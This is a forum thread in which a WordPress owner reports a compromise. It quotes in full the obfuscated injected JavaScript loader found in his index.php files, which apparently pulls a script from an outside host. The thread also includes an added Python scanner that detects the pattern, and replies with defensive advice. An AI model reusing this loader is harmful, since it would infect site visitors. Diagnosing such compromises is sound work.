Have I been hacked?

by Tom Lazenby 4 replies
Hey guys,

I have a couple of WordPress sites with RAP installed. A few days ago Site 1 completely stopped working. I'd type in my main URL and be greeted with a blank screen and one line of text...

"Parse error: syntax error, unexpected '?' in /home/mysite/public_html/mysite.com/index.php on line 18"

Luckily I could still log into my WordPress dashboard. I upgraded to the latest version of WordPress and my site came back. When I looked in the 'index.php' file for my site AND in all the index.php files for each of the RAP products, I found this weird code...

<script type="text/javascript">var gRYBe1oT = "ihhu328ihhu335";var

ta0QoMGA0 = "ihhu33cihhu373ihhu363ihhu372ih"; var ta0QoMGA1 =
"hu369ihhu370ihhu374ihhu320ihhu"; var ta0QoMGA2 =
"374ihhu379ihhu370ihhu365ihhu33"; var ta0QoMGA3 =
"dihhu322ihhu374ihhu365ihhu378i"; var ta0QoMGA4 =
"hhu374ihhu32fihhu36aihhu361ihh"; var ta0QoMGA5 =
"u376ihhu361ihhu373ihhu363ihhu3"; var ta0QoMGA6 =
"72ihhu369ihhu370ihhu374ihhu322"; var ta0QoMGA7 =
"ihhu320ihhu373ihhu372ihhu363ih"; var ta0QoMGA8 =
"hu33dihhu322ihhu368ihhu374ihhu"; var ta0QoMGA9 =
"374ihhu370ihhu33aihhu32fihhu32"; var ta0QoMGA10 =
"fihhu363ihhu36fihhu375ihhu36ei"; var ta0QoMGA11 =
"hhu373ihhu36cihhu361ihhu376ihh"; var ta0QoMGA12 =
"u32eihhu373ihhu365ihhu372ihhu3"; var ta0QoMGA13 =
"76ihhu365ihhu36dihhu370ihhu333"; var ta0QoMGA14 =
"ihhu32eihhu363ihhu36fihhu36dih"; var ta0QoMGA15 =
"hu32fihhu32fihhu36dihhu36cihhu"; var ta0QoMGA16 =
"32eihhu370ihhu368ihhu370ihhu32"; var ta0QoMGA17 =
"2ihhu33eihhu320ihhu33cihhu32fi"; var ta0QoMGA18 =
"hhu373ihhu363ihhu372ihhu369ihh"; var ta0QoMGA19 = "u370ihhu374ihhu33e";
var Dr6aBsRr = "gBEj328ihhu335";var LMOjuKdO =
ta0QoMGA0+ta0QoMGA1+ta0QoMGA2+ta0QoMGA3+ta0QoMGA4+ ta0QoMGA5+ta0QoMGA6+ta
0QoMGA7+ta0QoMGA8+ta0QoMGA9+ta0QoMGA10+ta0QoMGA11+ ta0QoMGA12+ta0QoMGA13+
ta0QoMGA14+ta0QoMGA15+ta0QoMGA16+ta0QoMGA17+ta0QoM GA18+ta0QoMGA19;
mWh6WOln = LMOjuKdO.replace(/ihhu3/g,"%");var qxMicDSd = unescape;var
gRYBe1oT = "JZGKi28gBEj335";w9221 = this;var jb4cyJmr=w9221
["WJd5GoGJc2uG5mJGe2JnltJ".replace(/[J52WlG\:]/g, "")];jb4cyJmr.write
(qxMicDSd(mWh6WOln));</script><div id='modalWindow' class='jqmWindow'>
<div id='jqmTitle'> <button class='jqmClose'>

Luckily I had a backup and this code was nowhere to be found in my backup files. So someone or something has put this code on my site. I went through and deleted this code from all of my index.php files, changed all my passwords and so far so good.

Unfortunately, tonight I checked my second site, also WordPress but on a completely different server (different hosting company too), and EXACTLY the same thing has happened there.

Any ideas?
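
Added example, not part of the original post: a static check for the pattern visible in the injected script above, where a marker token is swapped for "%" and the result is passed through unescape and written into the page. It flags .php files that contain such a block without executing or decoding it; the function names, the hit threshold and the sample (generated here with a harmless payload) are assumptions made for this illustration.

```python
import re
from pathlib import Path

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# .replace(/MARKER/g,"%"): a literal token swapped for '%' before unescape()
MARKER_RE = re.compile(r"""\.replace\(\s*/([^/\n]{2,20})/g\s*,\s*["']%["']\s*\)""")
STRING_RE = re.compile(r'"([^"\n]*)"')

def suspicious_scripts(text, min_hits=5):
    """Return (marker, hits) for each inline script that rebuilds a %-encoded string."""
    findings = []
    for body in SCRIPT_RE.findall(text):
        m = MARKER_RE.search(body)
        if not m or "unescape" not in body:
            continue
        marker = m.group(1)
        # The encoded text is split across many variables, often mid-marker,
        # so join the string literals before counting occurrences.
        joined = "".join(STRING_RE.findall(body))
        hits = joined.count(marker)
        if hits >= min_hits:
            findings.append((marker, hits))
    return findings

def scan_tree(root):
    """Map each flagged .php file under root to its findings."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        found = suspicious_scripts(path.read_text(errors="ignore"))
        if found:
            report[str(path)] = found
    return report

def constructed_sample(marker="qzk7", chunk=8):
    """Constructed test input: same layout as the injected block, harmless payload."""
    enc = "".join(f"{marker}{b:02x}" for b in b"<i>demo</i>")
    parts = [enc[i:i + chunk] for i in range(0, len(enc), chunk)]
    decls = "".join(f'var c{i} = "{p}";' for i, p in enumerate(parts))
    total = "+".join(f"c{i}" for i in range(len(parts)))
    return (f'<script type="text/javascript">{decls}var s = ({total})'
            f'.replace(/{marker}/g,"%");var u = unescape;document.write(u(s));'
            f'</script>\n<?php // rest of index.php ?>')

if __name__ == "__main__":
    import sys
    for name, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(name, found)
```

Run it against a local copy of the web root and compare every flagged file with the known-good backup before editing anything.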
  • Headfirst
    Check your computer. Odds are the malware is on your computer and connecting through wordpress from there.

    I've been seeing this more and more. They may have been able to grab your passwords through your FTP client. FTP is a pretty insecure protocol. You should think about switching to SCP once you have everything figured out.

    But, to get back to my initial point, if two sites on two separate servers got hit with the same malware and the only thing tying the two systems together is your computer, then that is where the problem is.

    Sorry for the run-on sentence...
  • clever7
    I know nothing about HTML codes, but hackers are terrible! They destroyed 4 of my Blogger blogs in 2009 (with malware, after getting my codes) and nobody ever helped me with this matter. We have no protection online.

    I’m sorry I can’t help you. I’m just writing something because nobody answered your post and I was a victim of a hacker in the past. What a terrible experience!

    You are not alone.

  • Slickest
    Were you using a theme you had bought? Sometimes if you try to remove, like, the copyright or some other code from a theme you'll get some errors too - they don't like that... and sometimes they have stuff built in to do weird stuff if you do take it out - just throwing that out there (has happened to me).

    I found this forum (in German - just use Google Translate) where someone posted the same problem - Security » JavaScript auf kompromittiertem Server » RootForum Community » Forum
    Slickest.com selling and brokering domain names since 1998!
    Need Adult Writing done? Contact me! Custom from PG to XX
  • theresagas
    I never got that problem, but I am pretty afraid of hacking to my blogs, as it is my blood and tears that I try to do every day.